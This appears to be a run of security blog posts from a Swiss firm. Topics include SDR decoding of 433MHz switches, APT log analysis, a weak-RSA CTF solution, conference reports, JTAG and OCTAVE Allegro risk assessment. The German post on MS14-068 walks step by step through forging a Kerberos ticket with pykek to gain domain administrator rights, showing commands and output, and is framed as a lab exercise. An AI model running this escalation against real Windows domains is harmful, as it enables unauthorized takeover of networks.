Software Defined Radio (SDR) and Decoding On-off Keying (OOK)

This post will give a quick intro into software defined radio (SDR) basics and provide guidance for the decoding of a very simple form of digital modulation (on-off keying).

Device Wireless Specs

Wireless junk hacking is not too difficult. Usually, devices transceive in the 433MHz or 868MHz ISM radio bands. As these bands are somewhat lax with licensing all devices operating in these bands must be capable of tolerating interferences of other band users. Pretty much comparable to the Internet ūüôā The European communications office (ECO) maintains a list of bands for European countries, including Switzerland. The list provides information allocated ranges and its specific purpose e.g. 5000MHz to 5030MHz is reserved to the GALILEO global navigation satellite system (GNSS) project.The US make it even simpler to get up to speed with any junk’s wireless configuration (frequency, modulation types and line coding). Every wireless device approved for the US market must carry an FCC ID. The online catalog provides access to the wireless specs of the devices based on its ID (usually printed on the device’s back or specification sticker).

Radio Observation

Alexandru Csete’s gqrx software defined radio comes in as a handy spectrum analyzer when looking for exact frequencies. It’s mainly based on the GNU radio project and supports all well-known platforms (Ettus USRPs, BladeRF, HackRF, RTL chipset et. al).

For the devices I have at hand (light switches, temperature and humidity sensors, car keys, M-Bus transmitters) it worked out they all operate in the 433MHz and 868MHz bands and can be easily observed with gqrx.


The spectrum analyzer (mouse tooltip) tells us that the specific light switch is operating at 433.93 MHz. An interestingly enough gqrx supports other fun and geek stuff such as listening to FM radio or eavesdrop on road work and building site radio conversations.

Signal Capturing

Well, signal capturing slightly varies depending on the device and library you use. The device I used for this tutorial is originally an DVB-T USB stick but comes with the relevant Realtek RTL2832 chipset and goes for a few bucks on most major reseller platforms. Check the supported hardware list at the gnuradio site. Hat tip to the Defcon Switzerland folks who provided me with one for cheap.

The following lines give an idea on how to capture signals with the Realtek chipset family of devices.

bla@bli:~$ rtl_sdr -f 433850000 -s 1000000 -g 20 switch.cu8
 Found 1 device(s):
 0:  Realtek, RTL2838UHIDIR, SN: 00000001

Using device 0: Generic RTL2832U OEM
 Found Rafael Micro R820T tuner
 Exact sample rate is: 1000000.026491 Hz
 [R82XX] PLL not locked!
 Sampling at 1000000 S/s.
 Tuned to 433850000 Hz.
 Tuner gain set to 19.70 dB.
 Reading samples in async mode...
 ^CSignal caught, exiting!

User cancel, exiting...

Make sure not to capture at the exact determined frequency of the device but rather slightly above or below as the¬†internal synthesizer will otherwise interfere and overlay¬†the signal. Note, that we chose to sample the signal at a rate of 1 million samples per second (1 Msps) and the output¬†I/Q data was stored in the cu8 format. Some tools create outputs as complex signed int (.cs8, HackRF), others as complex unsignend int (.cu8, RTL) and GNU radio prefers complex float format (.cfile). There is a GNU Radio Companion (GRC) template and Paul Brewer’s rtlsdr-to-gqrx tool for conversion from .cu8 to .cfiles, should one need to pivot between the file types.

Alternatively one could use gqrx and record or replay signals in cfile format (Menu bar => Tools => I/Q recorder, CTRL-I). Note: Replay doesn’t transmit your signal but displays your capture within gqrx.

Signal Inspection

I used¬†inspectrum to inspect my capture files. Once loaded, the capture coloring needs some tweaking but usually gives good hints on simple modulation, codings (e.g. Manchester) and the signal’s symbol rate.


Usually, slight zoom and adjustment of power max an min sliders allows to easily discover the on-off keying modulation used in the example. Set the correct sample rate and drag the grid over the signal in order to determine the symbol rate of the signal.


The symbol rate of the switch signal is 1631 Hz. Scrolling through the capture will also reveal that the on and off signal of the switch only differ in few locations, share the same bit heading and are being sent multiple times in a sequence. Pressing the button once obviously results in three or more transmissions of the on or off signal.

Signal Decoding

The GRC is the tool of choice for simple digital signal processing. It provides a building block GUI that allows for quick design of processing flows. The following design serves as a quick and dirty approach for OOK demodulation.


The relevant variables for the decoding are the sample rate (samp_rate: 1 Msps) and the symbol rate (baud_rate: 1631 Hz) which must be set to the values determined before.

The file source points to .cfile version of the previously captured signals and feeds data into a throttle block to avoid infinite processing speed. The “Complex to Mag^2” and “Threshold” blocks will convert the signal wave forms into a rectangular pulse of ones and zeros. Note, that the data type switched from complex (light blue) to float (orange) with the “Complex to Mag^2” block.

The “Keep 1 in N” block will assure the one bit is represented by a single data point. N is computed as samp_rate/baud_rate. Note, such rough way of signal processing may not work with signals that slightly vary the baud rate or with long lasting sequences. Even with short signals one must expect small errors. The scope sink then displays the decoded binary values.


Compare the scope plot to the previous inspectrum screenshot and you will notice that the demodulated signal actually compares with the figure in inspectrum.

Signal Analysis

GRC Visualization Support

None of the visual sinks in GRC provide easy means to visualize binary streams and adjustments to easily spot patterns and variations between streams. Thus, I decided to come up with a custom out-of-tree module for binary visualization and inspection, in short BinViz.

The initial GRC project requires small justifications to feed data into BinViz instead of the WX GUI Scope.


The “Float to Char” block will convert float values into 0x00 and 0x01. Moreover, the “Unpacked to Packed” block will squeeze eight chars into a single byte (e.g. 0x00 0x00 0x00 0x01 0x01 0x01 0x01 0x01 => 0x1F) and feed this into BinViz.

BinViz Configuration

Parameters start, end and drop patterns allow for justification of how streams are displayed and aligned. These parameters take strings composed of 0s and 1s e.g. 01010101 as a preamble or start pattern. The display will start on a new line for each occurrence of the start pattern. On detection of the end pattern the display will wrap to a new line. In case both, the start and end pattern are defined, the display will drop any out-of-bounds bits and only display streams from start to end on a single line each. Once the start pattern is being detected additional occurrences of the pattern will be ignored until the end is detected.

To get rid of long sequences of zero bytes or arbitrary unwanted bit sequences set “skip zero bytes” to true or define a string of 0s and 1s for the drop pattern to be removed. Note, the drop pattern and “skip zero bytes” have precedence over start and end detection patterns.


The display itself allows for some semi-live adjustments and manual analysis. E.g. the mouse wheel on the display allows to zoom-in and zoom-out while new bits are being displayed instantly. Once the display is clicked it will stop painting new bits and display a cursor and its x/y-position. In that mode, one could easily count bits or select part of the bitstream for magnification and closer inspection.

Visual Signal Analysis

Earlier analysis using inspectrum lets us observe six occurrences of the on signal when switching on and further six occurrences of the off signal when switching off. For this type of wireless junk it is probably irrelevant how many times the receiver picks up the signal. As noted earlier it is rather a matter of resilience towards other ISM band users to send the signal multiple times. Just to make sure its being picked up, sooner or later.


BinViz was configured “11010011” for the start and “1001001001001001001” for the end pattern. That way, only relevant data is displayed. Thanks to BinViz capabilities the six on and off signals are easily recognizable as single rows. Moreover, the the differences between the on and off signals is immediately clear.

Looking forward for you contributions

Hands-on, IoT Security Training

If you need more hands-on with junk hacking or analysis of IoT devices then you are very welcome to join us for our brand new practise oriented training on “IoT Security” held in German at the Compass head office in Jona on September 20th/21st 2016. Sign-up here.

Netzwerktraffic und APT Analyse

Compass Security wird vermehrt von Kunden bzgl. Verdacht auf Advanced Persistent Threat (APT) kontaktiert. Unter die Bezeichnung “APT” fallen komplexe, zielgerichtete und √§usserst effektive Angriffe auf kritische und zuweilen gar unternehmenswichtige Computersysteme bzw. deren gespeicherte Informationen.
Die Analyse von potentiell infiltrierten Netzen und Systemen gestaltet sich jedoch als enorm aufw√§ndig, da Unmengen von Datens√§tzen und Logs ausgewertet werden m√ľssen. Compass hat deshalb¬†immer wieder verschiedene Aspekte im Bereich APT, Forensik und Incident Response beleuchtet. Einerseits betreiben wir Research mit internen “Hack Labs” und “Research Weeks”, wo unsere Spezialisten sich mit den neusten Erkenntnissen der Scene auseinandersetzen bzw. diese weiter treiben und andererseits¬†bearbeitet Compass in Zusammenarbeit mit den Security Fachabteilungen einer Vielzahl von Hochschulen, entsprechende Themen.

Eine entsprechend gew√ľrdigte Maturaarbeit aus dem letzten Sommer m√∂chten wir der √Ėffentlichkeit nicht l√§nger vorenthalten und publizieren darum die Resultate im Rahmen dieses Posts. Im Mittelpunkt des Whitepapers steht die Analyse von APT mittels Splunk, einer spezialisierten Software zur Analyse von grossen Mengen maschinengenerierter Logdaten. Es werden darin auch alternative Wege zur Auswertung eruiert und ein Standardvorgehen f√ľr APT F√§lle vorgeschlagen. Das Paper greift auch das bei Compass √ľbliche Vorgehen bei forensischen Analysen auf und gibt dem technischen Leser in gewohnter Compass manier, viele technische Details mit auf den Weg. Nat√ľrlich auch einige Ideen, wie man das Logging von bestimmten Diensten optimieren k√∂nnte.

M√∂chten Sie gerne mehr zum Thema wissen? M√∂chten Sie auch erfahren, was dies in der Praxis bedeutet? Dann k√∂nnen wir Ihnen unser n√§chstes “Hands-on Seminar” mit dem Titel: Network Analysis & Advanced Persistent Threats vom 25. und 26. August 2015 in Bern empfehlen.

In der Zwischenzeit w√ľnschen wir Ihnen viel Spass beim Schm√∂kern. Behalten Sie einen k√ľhlen Kopf compass_security_schweiz_whitepaper_apt_network_analysis_w_splunk_v1.1.pdf.

Compass Security Crew,
Cyrill Brunschwiler

Vom Domäne Benutzer zum Domäne Administrator (exploit MS14-068)

Der von Microsoft publizierte “out-of-band” Patch MS14-068 [1] (Vulnerability in Kerberos Could Allow Elevation of Privilege – 3011780) behebt eine Schwachstelle in Kerberos, welche es einem normalen Benutzer erlaubt, administrative Privilegien in der Windows Dom√§ne zu erlangen. Die ersten √∂ffentlichen Artikel [2] mutmassten, dass die Kerberos Services den CRC32 Algorithmus als g√ľtlige Signatur auf Tickets akzeptieren. Per letzten Freitag wurde dann ein Tool namens Pykek [3] (Python Kerberos Exploitation Kit) publiziert, mit welchem die Schwachstelle in ein paar wenigen Schritten ausgenutzt werden kann.

Im Hacking-Lab [4] k√∂nnen Abonnenten und Lizenznehmer diese Schwachstelle risikofrei, in einer gesch√ľtzten Umgebung, selbst testen. Folgende Schritte erkl√§ren das Vorgehen:

  1. Download und entpacken von pykek (Python Kerberos Exploitation Kit) von
  2. Installieren des Pakets krb-user
    root@lcd806:~# apt-get install krb5-user
  3. Konfiguration des Domänenamen (in Grossbuchstaben): COMPA.NY sowie Authentication Service (AS) und Ticket Granting Service (TGS):
  4. Konfiguration des DNS /etc/resolve.conf welcher √ľblicherweise auf das Active Directory (AD): zeigt
  5. Starten von kinit
    root@lcd806:~# kinit hacker10@COMPA.NY
    Password for hacker10@COMPA.NY:
    kinit: Clock skew too great while getting initial credentials

    Hint: Das Kommando kann fehlschlagen, wenn die Serverzeit zuviel von der Zeit auf dem Angreifersystem abweicht. Es muss dann die Systemzeit des Angreifer wie in Schritt 6 und 7 gezeigt, nachgef√ľhrt werden.

  6. Optional: AD Systemzeit ermitteln, falls die Abweichung zu gross ist
    root@lcd806:~# nmap ‚ÄďsC
    | smb-os-discovery:
    |   OS: Windows Server 2003 3790 Service Pack 1 (Windows Server 2003 5.2)
    |   OS CPE: cpe:/o:microsoft:windows_server_2003::sp1
    |   Computer name: csl-ad
    |   NetBIOS computer name: CSL-AD
    |   Domain name: compa.ny
    |_  System time: 2014-12-07T15:07:11+01:00
    root@lcd806:~# date
    Sun Dec  7 15:17:47 CET 2014
  7. Optional: Nachf√ľhren der Systemzeit auf dem Angreifersystem, falls notwendig und nochmals den Schritt 5 durchf√ľhren.
  8. Pr√ľfen der Kommunikation mit dem Domain Controller resp. Active Directory. F√ľr //CSL-AD.COMPA.NY/c$ sollte ein “Access Denied” resultieren. F√ľr //CSL-AD.COMPA.NY/netlogon ein “Success”.
    root@lcd806:~# smbclient -k -W COMPA.NY //CSL-AD.COMPA.NY/c$
    OS=[Windows Server 2003 3790 Service Pack 1] Server=[Windows Server 2003 5.2]
    tree connect failed: NT_STATUS_ACCESS_DENIED
    root@lcd806:~# smbclient -k -W COMPA.NY //CSL-AD.COMPA.NY/netlogon
    Enter hacker10's password:
    Domain=[COMPA] OS=[Windows Server 2003 3790 Service Pack 1] Server=[Windows Server 2003 5.2]
    smb: \> ls
    .                                   D        0  Wed Feb 18 14:22:57 2009
  9. Start rpcclient und eine Verbindung zum AD herstellen
    root@lcd806:~# rpcclient -k CSL-AD.COMPA.NY
  10. Die SID eines normalen User auslesen. Bspw. hacker10
    rpcclient $> lookupnames hacker10
    hacker10 S-1-5-21-3953427895-231737128-487567029-1107 (User: 1)
  11. Mit Hilfe der SID und pykek wird nun ein Ticket mit administrativen Privilegien generiert
    root@lcd806:~# python -u hacker10@COMPA.NY -s S-1-5-21-3953427895-231737128-487567029-1107 -d CSL-AD.COMPA.NY
    [+] Building AS-REQ for CSL-AD.COMPA.NY... Done!
    [+] Sending AS-REQ to CSL-AD.COMPA.NY... Done!
    [+] Receiving AS-REP from CSL-AD.COMPA.NY... Done!
    [+] Parsing AS-REP from CSL-AD.COMPA.NY... Done!
    [+] Building TGS-REQ for CSL-AD.COMPA.NY... Done!
    [+] Sending TGS-REQ to CSL-AD.COMPA.NY... Done!
    [+] Receiving TGS-REP from CSL-AD.COMPA.NY... Done!
    [+] Parsing TGS-REP from CSL-AD.COMPA.NY... Done!
    [+] Creating ccache file 'TGT_hacker10@COMPA.NY.ccache'... Done!
  12. Nun muss auf dem Angreifersystem noch das eben erstellt Kerberosticket gesetzt werden
    root@lcd806:~# mv TGT_hacker10\@COMPA.NY.ccache /tmp/krb5cc_0
  13. Das wars. Wir sind Domäne Administrator
    root@lcd806:~# smbclient -k -W COMPA.NY //CSL-AD.COMPA.NY/c$
    OS=[Windows Server 2003 3790 Service Pack 1] Server=[Windows Server 2003 5.2]
    smb: \> ls
    AUTOEXEC.BAT                        A        0  Tue May  3 00:44:46 2005
    boot.ini                         AHSR      208  Tue May  3 21:30:40 2005
    CONFIG.SYS                          A        0  Tue May  3 00:44:46 2005
    Documents and Settings              D        0  Fri May 29 14:03:55 2009
    IO.SYS                           AHSR        0  Tue May  3 00:44:46 2005
    MSDOS.SYS                        AHSR        0  Tue May  3 00:44:46 2005
    NTDETECT.COM                     AHSR    47772  Tue May  3 21:21:58 2005
    ntldr                            AHSR   295536  Tue May  3 21:21:58 2005
    pagefile.sys                      AHS 402653184  Sat Sep 17 16:50:27 2011
    Program Files                      DR        0  Thu May  5 12:18:47 2011
    RECYCLER                          DHS        0  Tue May  3 22:24:29 2005
    System Volume Information         DHS        0  Tue May  3 21:34:10 2005
    test.txt                            A       10  Thu Sep 30 14:37:49 2010
    WINDOWS                             D        0  Thu May  5 14:34:45 2011
    wmpub                               D        0  Tue May  3 00:45:57 2005
    65535 blocks of size 131072. 32678 blocks available


Bekannte Issues

  • Es ist wichtig, dass die Zeit auf den Systemen synchron ist.
  • Gem√§ss √∂ffentlichen Statements funktioniert pykek bis und mit¬†Domain Controllers (DCs) mit Windows 2008 R2. Dies weil die Ausnutzung f√ľr DCs mit Windows 2012 und sp√§ter “leicht komplizierter” [5,6] ist.


Installation des “out-of-band” Patch MS14-068


Alexandre Herzog f√ľr das¬†Tracken der MS Issues und dieses Tutorial.



Compass Mitarbeiter erneut ausgezeichnet

Nachdem am 25. Mai 2014 bereits Alexandre Herzog, CTO bei Compass Security, mit dem 1337-Award durch die SGRP, einer Alumni-Organisation f√ľr MAS Information Security[1] Absolventen der Hochschule Luzern, ausgezeichnet [2] wurde, ist es erneut einem Compass Mitarbeiter gelungen, die Fachjury von seinem ausserordentlichen Wissen und K√∂nnen zu √ľberzeugen.

Lukas Reschke hat im Rahmen seines Praktikums bei der Compass Security eine Abschlussarbeit zur Analyse von Advanced Persistent Threat (APT) geschrieben. Die Arbeit beschreibt APT generell, gibt Einblicke in forensische Vorgehensweise, zeigt Erkennungsmuster auf und gibt Tips und Tricks f√ľr die Analyse von b√∂sartigem Netzwerkverkehr mittels Splunk .

Im Rahmen der Abschlussfeier vom 3. Juli 2014 in der Tonhalle St. Gallen wurde Lukas Reschke in zweierlei Hinsicht f√ľr seine Leistungen an der Kantonschule am Br√ľhl in St. Gallen geehrt.

Zum einen wurde er f√ľr den Aufbau des Tech-Mentorship geehrt, welches er im Alleingang ins Leben gerufen und aufgebaut hat. Das Tech-Mentorship, hat zum Ziel, dass Sch√ľler mit herausragenden IT-Kenntnissen ihren Kammeraden den Umgang mit der Technik w√§hrend dem Studium erleichtern und auch als Anlaufstelle f√ľr IT Probleme zur Verf√ľgung stehen. F√ľr diese ausserordentliche Leistung wurde er vom Ehemaligenverein der Kantonsschule am Br√ľhl mit einem Preisgeld von 500 Franken ausgezeichnet. Zum anderen wurde Lukas f√ľr die beste Abschlussarbeit des Studiengangs WMI mit einer Note von 5,9 gew√ľrdigt.

Lukas, die Compass Crew gratuliert dir auf diesem Weg nochmals ganz herzlich!

Grosse Teile der Erkenntnisse aus seiner Arbeit sind bereits in das neue Hands-on Seminar “Network Analysis & Advanced Persistent Threat” eingeflossen und ist somit den besten Experten im europ√§ischen Raum zug√§nglich. Unsere Leser d√ľrfen sich zudem auf die Publikation des entstandenen Whitepapers per Anfang September freuen.

Nächste Kurse
– 11. und 12. September 2014 in Bern, iPhone und iPad Security
– 11. und 12. November 2014 in Bern, Network Analysis & Advanced Persistent Threat

[1] HSLU MAS Information Security 
[2] SGRP Auszeichnung Alexandre Herzog f√ľr ” Crypto-based security mechanisms in Windows and .NET ”¬†



Release of Smart Meter Security Controls Whitepaper at Hack in Paris 2014

This article was published when I just flipped through the final slides talking at “Hack in Paris” on smart meter wireless protocol issues. The combo of trainings, conference and the “nuit du hack” is held at the Disney Land Resort Paris for the 4th edition.


Yes, Disney Land. When I arrived at the hotel I ran into a crowd of kids gathering around Goofy. Their parents ready to capture to moment of joy. When I entered my room, a Pluto greeting card spread a warm welcome from the small desk. A Bambi painting decorates the wall and the body wash has Mickey Mouse ears at its cap.

Well, as unusual it sounds, isn’t it imagination, creativity and an urge to play what the venue and hackers share? We are definitely not the average visitor and this got immediately confirmed when I showed up at breakfast where the waiter somewhat puzzled asked me: “Combien ?”. Still watching at the corner, expecting kids and wife would turn up in a second. “No, je suis tout seul”, I answered with a smile ūüôā

For Comic fans definitely a must see and must stay. The venue’s magic is what really matters in life: fun and family. So do hackers love to have fun and to share knowledge with equal minded.

While we are at sharing stuff. For those who have ever looked for a security checklist for smart meters. Here it is: compass_security_smart_meter_controls_whitepaper_v1.0

That checklist built the foundation of all my research. The full paper features a lengthy introduction and analysis based on the OCTAVE Allegro Risk Assessment method in order to identify suitable controls for smart meters. For the quick reader: Skip to chapter 3.3 for the total list of 43 smart meter controls. Your feedback is highly appreciated!

And here are the links to the HIP 2014 slides, the git repos and other related work

Presentation Slides HIP 2014
Whitepaper Blackhat 2013
Google Go Sniffer & MUC (credits
Python Sniffer ‚ÄěScambus‚Äú
GNU Radio wM-Bus (credits
– Clipart credits go to

For those interested in solving puzzles and hands-on security training sign-up for a free remote account and get knee deep into our virtual pwnable lab. Hacking-lab features a wide variety of information security, penetration testing, security assessment and forensics hands-on training exercises to educate students and information security professionals. Give it a try.


Calculating RSA private keys from its public counterpart

Compass crew members just got back to work from a fun weekend/night at Insomni’hack (Geneva) where hackers met [0] to solve puzzles and enjoying the hacker community. On the way back home was sufficient time to clean-up systems and to reflect on some of the challenges.

There was a variety of brain teasing puzzles relating to application, network and computer security, digital forensics, reversing or steganography. During the contest the team gets more challenging puzzles unlocked by the time they hand in solutions. The solutions was always some sort of special formattet string a.k.a. token or nugget.

I decided to write-up one of the puzzles to have it documented of course and to provide you with an idea how such a puzzles looks like. So, let’s dig into it.

Challenge: “An ancient device is sending beacons. Let’s see whether we can derive information from it.”

The beacons received were


Interestingly, the number of beacons matches the number of characters required for submition to the nugget verification application of that hacking challenge and for some reason we also have a copy of a public key.

-----END PUBLIC KEY-----

As we all know, we can’t use that key to get any plaintext from information protected with an asymmetric cryptographic algorithm. However, let’s have a quick look on the parameters of the key:

$ openssl rsa -pubin -in pubkey.txt -modulus -text
Public-Key: (388 bit)
Exponent: 65537 (0x10001)

Usually, for sufficiently large and properly chosen keys, the derivation of the private key from its public coutnerpart is not possible. In this case, the key size is obviously not that large and as we have no other information so far, let’s try to bluntly factorize the modulus N.

You could either try to do so online [1] or use CryptTool [2].rsa_public_key_cracking

The result clearly shows that an unfortunate combination of primes was chosen as the base of the key material.


So let’s see whether we can calculate the RSA private key from the parameters we have already.

The private key d can be calculate from e and phi whereby

e which is the exponent (see public key dump)
phi(N) which is based on the factorized primes and calculates as (p-1)(q-1)

Hint: Depending on your code, you might want to put e in decimal rather than in hex 0x10001 to avoid spending to much time on debugging ūüôā

Finally you will need to compute d = e^-1 mod phi(N) in order to get the private key.

Hint by M. ¬ęIf you’re already using CrypTool anyway, you could also use it to calculate d from p,q,e without having to code anything on your own: Indiv. Procedures > RSA Cryptosystem > RSA Demonstration.¬Ľ

If your prefer to solve it in python it’s far more challenging. I have not been very successfull in finding a python RSA library that allows for that specific calculation. Luckily there are lot’s of websites actually providing hints on how to calculate the modular inverse based on the extended euclidean algorithm. Thus I went for a copycat approach [3].

def egcd(a, b):
	x,y, u,v = 0,1, 1,0
	while a != 0:
		q, r = b//a, b%a
		m, n = x-u*q, y-v*q
		b,a, x,y, u,v = a,r, u,v, m,n
	return b, x, y

def modinv(a, m):
	g, x, y = egcd(a, m)
	if g != 1:
		return None
		return x % m

Finally, we will need to try whether the generated private key yields some resonable results on the beacons. The plaintext pt calculates as follows:

pt = beacon^d mod N

In python this is pow(beacon,d,n) rather than (beacon**d) mod n. Mathematically, both python statements should return the same result. However, pow is optimized to handle large factors whereas (beacon**d) mod n will take forever for RSA like calculations.

Finally, we get ASCII characters from each beacon which turned out to be the correct format and plaintext to qualify for a solution (python script –


And it did !!

Thanks to the SCRT team who actually built not only this but also other fun and challenging puzzles and thanks to those who were sufficiently patient to discuss twist and turns while battling!

For those interested in solving puzzles and hands-on security training join us for our awsome courses or sign-up for a free remote [4] account and get knee deep into our virtual pwnable lab. Hacking-lab features a wide variety of information security, penetration testing, security assessment and forensics hands-on training exercises to educate students and information security professionals. Give it a try.

[0] European hackers hit Geneva competition
[1] Online factor DB at
[2] CryptTool
[3] Extended Euclidean Algorithm Snippet
[4] Hacking-Lab

RHUL Information Security Group (ISG) Weekend Conference

Each year, the world renowned Royal Holloway University of London (RHUL) Information Security Group (ISG) invites potential, current and past students to join the weekend conference and meet with well regarded security researchers and experts from academia, UK government and the industries. Part of the tradition is to to have dinner at the wonderfull and well-preserved Founder’s Building (1881).


I felt very honoured to be explicitely invited to present part of my MSc thesis results in such well regarded environment.

Colin Walter, Director of Distance Learning, ISG: “As our top project students this year, it is my great pleasure to invite you each to give a short presentation at the next annual summer school for students and alumni of the distance learning MSc in Information Security, to be held at Royal Holloway on Sat/Sun 7-8 September 2013.”

Conference topics included risk management and information security accreditation programs, e-crime and bot net behaviour, cloud encryption and key management aspects, various communication protocols analysis as well as latest developments in side channel attack resistance.

Certificate revocation checking

Keith Vella Licari, currently with Deloitte Malta, provided insights into its master thesis on certificate revocation checking protocols. He discovered shortcomings which demand for improvement in the way certificate checking is currently done.

CRL OCSP Lightweight OCSP
Can easily become large
and unwieldy
Ambiguous answer
Pre-produced responses
Timeliness (delay until next
Only definitive answers are
digitally signed
Only definitive answers are
digitally signed
Scalability (self-inflicted
Optional protection against
replay attacks
No protection against
replay attacks
Table 1: Keith Vella Licari, Towards a reliable revocation status checking method, Main Issues

Table 1 provides an overview of the issues of the protocols subject to analysis. In order to provide improvement over the findings, Keith has formally proposed an alternative protocol (RSDP). He is currently asking for torough peer review of its proposal. I encourage readers, affiliated to either OWASP or to take on the challenge.

Defense by Nature

David Naccache, cryptographer and professor at the Universit√© Panth√©on-Assas in Paris and member of the √Čcole normale sup√©rieure Computer Laboratory, presented current research focusing on improvement of resistance to side-channel attacks. The study aimed to improve resistance for communication between of-the-shelf controllers/CPUs and memory parts. The approach taken basically involves transmission of empirically identified “fake” values along with the data to camouflage the communication emission.

The concept lends it an idea from nature where animals which share a common predator mimic the look-a-like of a poisonous counter-part (M√ľllerian mimicry) to get away disregarded. Some would actually call that approach “Security by Obscurity”. However, applying the technique to emission channels basically allows masking the leaked information to appear to be something else. All under the assumption the attacker and the designed have comparable analytical capabilities in terms of probes sensitivity and measurement equipment sampling rate. Thus, the approach could allow for better resistance of standard electronic components on the price of some factors larger memory than really needed.


Slides and videos will be pusblished soon. Check

Embedded devices and cell phone flash memory acquisition using JTAG

Back in Black (back from Black Hat with a bag full of schwag and branded black shirts). 

Black Hat and DEF CON again allowed insights into latest research and concerns. Where some topics loose grip ( vulnerability scanning, IPv4, DNS, general web issues) others gain momentum (DDoS, mobile computing, smart energy, industrial control and embedded systems). Myself was speaking on the advanced metering infrastructure and specifically on the security of the wireless M-Bus protocol. Slide deck and whitepaper are available for download from the Compass Security news page[1].

At that time, I would like to let you know about a little invention that makes reversing of embedded systems and industrial control devices partially easier. JTAGulator [2]. A device designed by Joe Grand, aka Kingpin and former DEF CON badge designer, with the sole purpose of identifying JTAG PINs and UART serial lines on printed circuit boards (PCB). There is no need to unomunt or desolder devices. JTAGulator can be configured to run on a range of voltages (1.2-3.3V) and features 24 I/Os that are arbitrarily connected to the board in order to identify the relevant pins. Note, that testing for the valid pinout might cause your little device behave strangely while JTAGulator tries to pull lines up and down. Thus, make sure you stay in safe distance ūüôā

Now, you wonder !!!@#$ JTAG!!!…understandably. Joint Test Action Group[3], is the name for a standardized hardware interface (IEEE 1149.1) that allows to test and debug integrated circuits. Most embedded devices (cell phones, wireless routers, …) nowadays implement the interface. Having enough information of the target device, the chip and its peripherals could be initialized and accessed using the JTAG interface. Specifically, the interface could allow access to flash memory contents. Thus, the technology comes in handy to acquire cell phone data on a low level or to extract the firmware of embedded devices.

JTAG interfaces are small boxes that interface between the embedded hardware and a common computer. For example, the Swiss based company Amontec[4] provides a high-speed general purpose interface at low cost (120 Euros). The box and its drivers are compatible with the OpenOCD software[5] an on-chip debugger that allows for programming and debugging of embedded devices using some specific command set and the GNU debugger[6]. The Android community[7] has adopted the approach for debug purposes of the Android kernel [8].

With that, I leave you for the moment and I promise we get back to you soon with more summaries on topics of interest.

[1] Slides and Whitepaper wireless M-Bus Security,
[2] JTAGulater,
[3] JTAG,
[4] Amontec,
[5] OpenOCD,
[6] GNU Debugger,
[7] Android Kernel,
[8] Video Android Kernel Debugging,

Compass Crew Member Speaking at Black Hat USA

Cyrill Brunschwiler’s talk was selected “among the very best research available today” to be presented side-by-side with the security industries top researchers on the world’s most renowned security conference – Black Hat USA in Las Vegas.

He will be speaking on “Energy Fraud and Orchestrated Blackouts: Issues with Wireless Metering Protocols (wM-Bus)”.

The work presented provides insights into the security of the Meter Bus (M-Bus) as specified within the relevant standards. The M-Bus is very popular in remote meter reading and has its roots in the heat metering industries. It has continuously been adopted to fit more complex applications during the past twenty years. According to a workshop note, an estimated 15 million devices were relying on the wireless version of M-Bus in 2010. It was analyzed whether smart meters using wireless M-Bus do fit the overall security and reliability needs of the grid or whether such devices might threaten the infrastructure.

The M-Bus standard has been analyzed whether it provides effective security mechanisms. It can be stated that wireless M-Bus seems to be robust against deduction of consumption behaviour from the wireless network traffic. For this reason, it is considered privacy-preserving against network traffic analysis. Unfortunately, vulnerabilities have been identified that render that fact obsolete. The findings are mainly related to confidentiality, integrity, and authentication.

Consequently, smart meters relying on wireless M-Bus and supporting remote disconnects are prone to become subject to an orchestrated remote disconnect which poses a severe risk to the grid. Further issues may lead to zero consumption detection, disclosure of consumption values, and disclosure of encryption keys.

The full abstract is available at, OWASP and ICS-labs folks attending either Black Hat or DEFCON drop me a note! I’ll be glad to meet you in person.

Lean Risk Assessment based on OCTAVE Allegro

The article will provide a quick overview and introduction into the Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) Allegro [1] methodology, its approach and terminology. OCTAVE Allegro is an asset centric and lean risk assessment successor of the OCTAVE method. The method supports a straight-forward qualitative risk assessment and structured threat analysis which mainly fits for smaller organisations (few hundred employees). Figure 1 is based on [2] and groups the methodology steps into four major phases.

OCTAVE Allegro Phases

  • Phase ‚ÄúEstablish Drivers‚ÄĚ aims to justify and prioritise the measurement criteria for risk for a specific organisation.
  • Phase ‚ÄúProfile Assets‚ÄĚ is designed to identify and document logical, technical, physical and people assets.
  • Phase ‚ÄúIdentify Threats‚ÄĚ focuses on the identification of threats against the identified assets.
  • Phase ‚ÄúIdentify and Mitigate Risk‚ÄĚ supports the valuation of the risks posed against the critical information assets. Finally, after this step, the mitigation strategy for each of the identified risks is defined.

Figure 1: OCTAVE Allegro steps and phases [2]

OCTAVE Allegro Steps

This section goes through all of the OCTAVE Allegros steps to provide an introduction into the methodology. Moreover, each step will be accompanied by a fictitious example related to AMI. Note, that dark coloured steps in figure 1 are considered major steps in order to conduct a threat analysis whereas light coloured steps are crucial when approaching a complete risk assessment.

Step 1 advises to identify all areas that impact an organisation. The methodology requires for a minimum set of areas which includes safety, health, productivity, reputation, financial and fines. For each of the impact areas, a set of criteria to measure low, medium and high impact must be developed. Table 1 provides an example for loss of revenue in case of data privacy violation. Finally, the major areas will be ranked and assigned values in order to allow for risk scoring. In case five areas have been identified and ‚Äúlegal penalties‚ÄĚ is considered the top risk area, then the area would be assigned a five. An example is provided in table 6.

Table 1: OCTAVE Allegro Step 1: Establish Risk Measurement Criteria. Impact Area Example

Step 2 provides guidance in identifying critical information assets for the organisation. The methodology also provides a set of questions and asks for example for the value of assets or the dependency on assets for the day-to-day business of the organisation. Each identified information asset will be attributed additional cornerstone such as the security requirements to make up a whole information asset profile. An example for key material in a smart meter is provided in table 2. Moreover, each profile’s most important security requirement is being identified to support the later valuation of the potential impacts. OCTAVE Allegro does not provide much guidance and structure on how to identify security requirements. A way to model such requirements is by means of misuse cases [3]. The misuse case approach lends it from the unified modelling language (UML) such as used in common software engineering processes where success and fail scenarios of interaction with data and processes is being modelled. Though, the modelling of misuse cases rather focuses on the abuse of such scenarios by malicious actors (misusers).

Table 2: OCTAVE Allegro Step 2: Develop Information Asset Profile. Critical Information Asset Example

Step 3 collects information asset containers in the form of an information asset risk environment map. Information asset containers, as the name implies, can hold, process or somehow get in touch with information assets. The methodology classifies containers as technical, physical and people. Table 3 provides examples for each of the types. Correspondingly, containers are being attributed whether they are of type internal which means under control of the organisation or whether the container is external.

Table 3: OCTAVE Allegro Step 3: Identify Information Asset Containers. Container Examples

For the analysis of an organisation the type column can be attributed with minimal effort. However, for an abstract analysis such as network protocols or embedded devices, some assumptions must be made. There is no general rule on what assumptions to make.

